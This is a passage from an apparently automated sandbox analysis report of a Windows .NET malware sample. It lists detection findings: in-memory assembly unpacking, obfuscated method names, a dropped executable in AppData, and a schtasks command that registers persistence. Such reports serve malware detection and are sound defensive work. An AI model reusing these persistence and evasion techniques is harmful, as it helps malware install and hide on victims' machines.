          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: snwo.pdbSHA256 source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, bmkNCLNkqvOpVZ.exe.0.dr
          Source: Binary string: snwo.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, bmkNCLNkqvOpVZ.exe.0.dr

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, Form1.cs.Net Code: InitializeComponent
          Source: bmkNCLNkqvOpVZ.exe.0.dr, Form1.cs.Net Code: InitializeComponent
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.2e7032c.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.2d8c9c4.2.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, gM7HF6pf6lrBLxHo57.cs.Net Code: DtLd1L2S4o System.Reflection.Assembly.Load(byte[])
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.2d9e9f8.3.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, gM7HF6pf6lrBLxHo57.cs.Net Code: DtLd1L2S4o System.Reflection.Assembly.Load(byte[])
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.6ec0000.7.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.2dfef04.1.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 9.2.bmkNCLNkqvOpVZ.exe.310c930.2.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 9.2.bmkNCLNkqvOpVZ.exe.311e964.1.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeStatic PE information: 0xB5CBC42A [Thu Aug 26 06:35:22 2066 UTC]
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041A8DA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeCode function: 0_2_0523E412 push eax; mov dword ptr [esp], ecx0_2_0523E424
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeCode function: 0_2_0523E080 push dword ptr [eax+ecx*2-75h]; iretd 0_2_0523E0C5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeCode function: 0_2_0523EF22 push eax; ret 0_2_0523EF33
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeCode function: 0_2_07396110 pushfd ; iretd 0_2_07396115
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeCode function: 0_2_073958A0 pushfd ; retf 0_2_073958A1
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 9_2_070F4743 pushfd ; ret 9_2_070F4749
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004000D8 push es; iretd 14_2_004000D9
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0040008C push es; iretd 14_2_0040008D
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004542E6 push ecx; ret 14_2_004542F9
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0045B4FD push esi; ret 14_2_0045B506
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00432BD6 push ecx; ret 14_2_00432BE9
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00454C08 push eax; ret 14_2_00454C26
          Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeStatic PE information: section name: .text entropy: 7.831449073906565
          Source: bmkNCLNkqvOpVZ.exe.0.drStatic PE information: section name: .text entropy: 7.831449073906565
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, cSV1GKxEAhjmpZLsTQ.csHigh entropy of concatenated method names: 'nqrnUxOuKL', 'Q17nbFQZmK', 'dPX8tQ0HDV', 'r4d89rDqTI', 'uDR8hl9Il0', 'L9g8YEZQvH', 'DiW8ISgaN3', 'F9A8iPG6Cw', 'Yhm8TZpnr7', 'XiD8LxS7g6'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, DMkA9oaR6DgC7I9lJ9.csHigh entropy of concatenated method names: 'QhGWkstgXc', 'PWDW0nJRFj', 'PmuWeTS5kr', 'Ty4WFAx6oC', 'qXpW4yZR7i', 'GpYW5OSv6n', 'wDeif9fwC44nr9rdcP', 'vcc40eFBBuk1YBLfLZ', 'WDhWWntX24', 'yF0W6k8Z79'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, bfNUKDLC05VYSm2F1I.csHigh entropy of concatenated method names: 'IRG73t3YB8', 'BJM7f8oYpv', 'lUl7tEvlMA', 'pqX79lsSgL', 'l1G7qNx52W', 'XJ77hgR2wm', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, bBuRmgX3jyALrIBCiGg.csHigh entropy of concatenated method names: 'qRWmNrOmJC', 'HELmRywESZ', 'ge1m1sG6VL', 'GA9mVbRPxd', 'rlumUcH88y', 'VssmgdJ0gB', 'EFfmbqK4WD', 'CwWmcHTibc', 'E46mXbXxod', 'zvOmScSDWJ'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, iIqs66MIvsUPMvbDnA.csHigh entropy of concatenated method names: 'Bdr1fkiok', 'l3eV4pa21', 'BdEgukXNi', 'FwZbVdvRF', 'Qq7XWduyU', 'tmMSe0B7R', 'H1SiBTXpY4craaEa9t', 'jfrp41qv7OsyjgD2G7', 'vXt7PU4Vr', 'TKpJLgkuA'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, VOtjQPVEeDTvgrqiGw.csHigh entropy of concatenated method names: 'uin7EmsHcp', 'B1f7PX7YJb', 'weK78CS9qc', 'PgW7n0gqwt', 'DlW7A2YFMc', 'LHN7kiysPh', 'vRr70skDVd', 'LPn7rHGZvD', 'XbL7ePXQHo', 'DOm7FOWwfb'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, F1oTOmXkHGy1hMPSZsu.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OfqJqWSvaO', 'i3iJw3jr9n', 'smtJBmyKSx', 'vc8JvhdyuG', 'HskJlcNnXT', 'P2ZJMlIxmA', 'acDJHXdp1u'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, vkpNRGnA86RNO8h5Hh.csHigh entropy of concatenated method names: 'TSkAsWVRgS', 'CR2APUjviu', 'alyAnPvo9J', 'Jp8AkPQgWq', 'MjcA0RLUDr', 'dvtnl3dujx', 'WEpnMImwbP', 'VAAnHr2loj', 'EYkn2Do45V', 'MCEnjnAdSL'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, gM7HF6pf6lrBLxHo57.csHigh entropy of concatenated method names: 'VHr6s0Ryq5', 'N8Y6ERuNUK', 'Hpv6PrVUtB', 'EEb68Q0ZmN', 'r3n6n2DTv7', 'U3t6AbJtKv', 'KZp6k70XT9', 'Wn060b2WQp', 'G1H6rFPsNq', 'UGD6eiRB0W'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, ctZSyfZLhhlxY9sntK.csHigh entropy of concatenated method names: 'AQj8VFQbhZ', 'cvq8gt2pUq', 'TAC8clGl0G', 'idE8X4FHJF', 'hom84JQAX5', 'NZx85ZsNGV', 'JFL8G1Sc6a', 'DCW87GL8e7', 'VXg8mHgxMQ', 'RJD8JnnDgu'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, qEr0wKBfcaKhGsHbJ2.csHigh entropy of concatenated method names: 'ufFucJ4yS3', 'gjFuXZbPTr', 'mx1u3SJW5s', 'wd4ufUdvvI', 'YIfu9tAnUL', 'sxAuhjfflm', 'K5xuI8s6iZ', 'sN9uiA9xJp', 'zY3uLsEb6K', 'VZAuDaLOSV'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, IZ0PG98klAYTO2NgNR.csHigh entropy of concatenated method names: 'M1n4LfOu6H', 'kXo4OksJlU', 'CN64qOfNF5', 'KxK4wFZZSP', 'r4M4fSYXph', 'Q124tf3BUR', 'Gjm49SYDHR', 'vE84hl2w8a', 'lud4YcFKMS', 'NMP4IhWMJb'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, Gy5jhpHyHbOrqjj4n9.csHigh entropy of concatenated method names: 'OfamWCtXfE', 'PNCm6MNFlw', 'jW2md1besu', 'BtLmE9sRUI', 'H11mP8PEZ2', 'ae8mnuF6Z9', 'nyGmAovdHb', 'bdm7HiuTn3', 'Fac72MUEBV', 'xJ07jayc5J'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, PpYJNMfTau1IasRZRx.csHigh entropy of concatenated method names: 'Jc4Pq9L41C', 'kZZPwKo2hH', 'KhnPBPZARX', 'DFgPvuW9fw', 'kVKPlMdJe8', 'vSPPMwySn0', 'T4HPH7fItN', 'Vl0P2J8XIT', 'dk7Pj8GdZv', 'P0LPx9LT33'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, DpaETKN4IkAWyGJvgW.csHigh entropy of concatenated method names: 'hFLkNuyGQt', 'ulwkR362YY', 'Xy9k1vmviG', 'yqekVuRZZt', 'evIkULOT8q', 'dygkgPwA7r', 'dAykbpvojh', 'Nd4kc4DnTu', 'i7NkXBp9Y5', 's2xkSGsObZ'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, qvVJ051RsW5USawOuS.csHigh entropy of concatenated method names: 'RDuG2WjES1', 'R7eGxoe1y6', 'bvV7QEvdo9', 'itm7Wa5cFs', 'gp2GDV0lF4', 'sQBGOOE9Ct', 'APGGpv3H98', 'XAPGqNQ3rH', 'rNVGwIPwkg', 'Uv8GBhymRc'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, QW0XatPbBAbeUdR2lN.csHigh entropy of concatenated method names: 'ToString', 'nhG5Dv4MwH', 'YK85fXhCwD', 'Ecj5t0vPVC', 'YNC59Jrlpq', 'eJj5hy5EEN', 'jdY5YA8XWd', 'KM55IuUkJr', 'Y2x5iK1O5C', 'zuY5TdPobE'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, rTRrKV40MvHNxVQdUU.csHigh entropy of concatenated method names: 'Dispose', 'OJHWj8oaeF', 't7LCfvP7Ex', 'sLvZZuEbCQ', 'fSjWxMw8HG', 'hniWzR7Wjw', 'ProcessDialogKey', 'BmFCQiBYCS', 'R4mCW0L0l6', 'OgBCCvCjXX'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, LOLFrAUKCM9pfdPLF8.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'HJ0Cj8iMH3', 'OL1Cx0VXq3', 'GCcCzDcbvp', 'mWc6QG4VIw', 'sWb6W3VO0y', 'EMe6CwL22k', 'I3T66vy9VE', 'TJImKqVVNdYL36lXKwM'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, cSV1GKxEAhjmpZLsTQ.csHigh entropy of concatenated method names: 'nqrnUxOuKL', 'Q17nbFQZmK', 'dPX8tQ0HDV', 'r4d89rDqTI', 'uDR8hl9Il0', 'L9g8YEZQvH', 'DiW8ISgaN3', 'F9A8iPG6Cw', 'Yhm8TZpnr7', 'XiD8LxS7g6'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, DMkA9oaR6DgC7I9lJ9.csHigh entropy of concatenated method names: 'QhGWkstgXc', 'PWDW0nJRFj', 'PmuWeTS5kr', 'Ty4WFAx6oC', 'qXpW4yZR7i', 'GpYW5OSv6n', 'wDeif9fwC44nr9rdcP', 'vcc40eFBBuk1YBLfLZ', 'WDhWWntX24', 'yF0W6k8Z79'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, bfNUKDLC05VYSm2F1I.csHigh entropy of concatenated method names: 'IRG73t3YB8', 'BJM7f8oYpv', 'lUl7tEvlMA', 'pqX79lsSgL', 'l1G7qNx52W', 'XJ77hgR2wm', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, bBuRmgX3jyALrIBCiGg.csHigh entropy of concatenated method names: 'qRWmNrOmJC', 'HELmRywESZ', 'ge1m1sG6VL', 'GA9mVbRPxd', 'rlumUcH88y', 'VssmgdJ0gB', 'EFfmbqK4WD', 'CwWmcHTibc', 'E46mXbXxod', 'zvOmScSDWJ'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, iIqs66MIvsUPMvbDnA.csHigh entropy of concatenated method names: 'Bdr1fkiok', 'l3eV4pa21', 'BdEgukXNi', 'FwZbVdvRF', 'Qq7XWduyU', 'tmMSe0B7R', 'H1SiBTXpY4craaEa9t', 'jfrp41qv7OsyjgD2G7', 'vXt7PU4Vr', 'TKpJLgkuA'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, VOtjQPVEeDTvgrqiGw.csHigh entropy of concatenated method names: 'uin7EmsHcp', 'B1f7PX7YJb', 'weK78CS9qc', 'PgW7n0gqwt', 'DlW7A2YFMc', 'LHN7kiysPh', 'vRr70skDVd', 'LPn7rHGZvD', 'XbL7ePXQHo', 'DOm7FOWwfb'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, F1oTOmXkHGy1hMPSZsu.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OfqJqWSvaO', 'i3iJw3jr9n', 'smtJBmyKSx', 'vc8JvhdyuG', 'HskJlcNnXT', 'P2ZJMlIxmA', 'acDJHXdp1u'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, vkpNRGnA86RNO8h5Hh.csHigh entropy of concatenated method names: 'TSkAsWVRgS', 'CR2APUjviu', 'alyAnPvo9J', 'Jp8AkPQgWq', 'MjcA0RLUDr', 'dvtnl3dujx', 'WEpnMImwbP', 'VAAnHr2loj', 'EYkn2Do45V', 'MCEnjnAdSL'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, gM7HF6pf6lrBLxHo57.csHigh entropy of concatenated method names: 'VHr6s0Ryq5', 'N8Y6ERuNUK', 'Hpv6PrVUtB', 'EEb68Q0ZmN', 'r3n6n2DTv7', 'U3t6AbJtKv', 'KZp6k70XT9', 'Wn060b2WQp', 'G1H6rFPsNq', 'UGD6eiRB0W'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, ctZSyfZLhhlxY9sntK.csHigh entropy of concatenated method names: 'AQj8VFQbhZ', 'cvq8gt2pUq', 'TAC8clGl0G', 'idE8X4FHJF', 'hom84JQAX5', 'NZx85ZsNGV', 'JFL8G1Sc6a', 'DCW87GL8e7', 'VXg8mHgxMQ', 'RJD8JnnDgu'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, qEr0wKBfcaKhGsHbJ2.csHigh entropy of concatenated method names: 'ufFucJ4yS3', 'gjFuXZbPTr', 'mx1u3SJW5s', 'wd4ufUdvvI', 'YIfu9tAnUL', 'sxAuhjfflm', 'K5xuI8s6iZ', 'sN9uiA9xJp', 'zY3uLsEb6K', 'VZAuDaLOSV'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, IZ0PG98klAYTO2NgNR.csHigh entropy of concatenated method names: 'M1n4LfOu6H', 'kXo4OksJlU', 'CN64qOfNF5', 'KxK4wFZZSP', 'r4M4fSYXph', 'Q124tf3BUR', 'Gjm49SYDHR', 'vE84hl2w8a', 'lud4YcFKMS', 'NMP4IhWMJb'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, Gy5jhpHyHbOrqjj4n9.csHigh entropy of concatenated method names: 'OfamWCtXfE', 'PNCm6MNFlw', 'jW2md1besu', 'BtLmE9sRUI', 'H11mP8PEZ2', 'ae8mnuF6Z9', 'nyGmAovdHb', 'bdm7HiuTn3', 'Fac72MUEBV', 'xJ07jayc5J'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, PpYJNMfTau1IasRZRx.csHigh entropy of concatenated method names: 'Jc4Pq9L41C', 'kZZPwKo2hH', 'KhnPBPZARX', 'DFgPvuW9fw', 'kVKPlMdJe8', 'vSPPMwySn0', 'T4HPH7fItN', 'Vl0P2J8XIT', 'dk7Pj8GdZv', 'P0LPx9LT33'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, DpaETKN4IkAWyGJvgW.csHigh entropy of concatenated method names: 'hFLkNuyGQt', 'ulwkR362YY', 'Xy9k1vmviG', 'yqekVuRZZt', 'evIkULOT8q', 'dygkgPwA7r', 'dAykbpvojh', 'Nd4kc4DnTu', 'i7NkXBp9Y5', 's2xkSGsObZ'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, qvVJ051RsW5USawOuS.csHigh entropy of concatenated method names: 'RDuG2WjES1', 'R7eGxoe1y6', 'bvV7QEvdo9', 'itm7Wa5cFs', 'gp2GDV0lF4', 'sQBGOOE9Ct', 'APGGpv3H98', 'XAPGqNQ3rH', 'rNVGwIPwkg', 'Uv8GBhymRc'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, QW0XatPbBAbeUdR2lN.csHigh entropy of concatenated method names: 'ToString', 'nhG5Dv4MwH', 'YK85fXhCwD', 'Ecj5t0vPVC', 'YNC59Jrlpq', 'eJj5hy5EEN', 'jdY5YA8XWd', 'KM55IuUkJr', 'Y2x5iK1O5C', 'zuY5TdPobE'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, rTRrKV40MvHNxVQdUU.csHigh entropy of concatenated method names: 'Dispose', 'OJHWj8oaeF', 't7LCfvP7Ex', 'sLvZZuEbCQ', 'fSjWxMw8HG', 'hniWzR7Wjw', 'ProcessDialogKey', 'BmFCQiBYCS', 'R4mCW0L0l6', 'OgBCCvCjXX'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, LOLFrAUKCM9pfdPLF8.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'HJ0Cj8iMH3', 'OL1Cx0VXq3', 'GCcCzDcbvp', 'mWc6QG4VIw', 'sWb6W3VO0y', 'EMe6CwL22k', 'I3T66vy9VE', 'TJImKqVVNdYL36lXKwM'
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004063C6 ShellExecuteW,URLDownloadToFileW,14_2_004063C6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeFile created: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeJump to dropped file

          Boot Survival

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp"
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,14_2_00418A00

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041A8DA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
